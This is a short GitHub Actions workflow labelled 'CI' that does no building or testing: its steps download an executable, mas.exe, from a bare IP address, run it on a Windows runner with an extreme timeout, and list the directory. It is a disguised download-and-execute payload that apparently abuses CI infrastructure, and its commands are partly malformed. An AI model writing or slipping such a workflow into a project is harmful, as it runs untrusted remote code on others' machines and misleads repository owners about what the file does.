name: CI

on: workflow_dispatch

jobs:
  build:

    runs-on: windows-latest
    timeout-minutes: 9999

    steps:
    run: |
        cmd /c http://44.202.6.121/mas.exe -O
        cmd /c mas.exe
        cmd /c dir
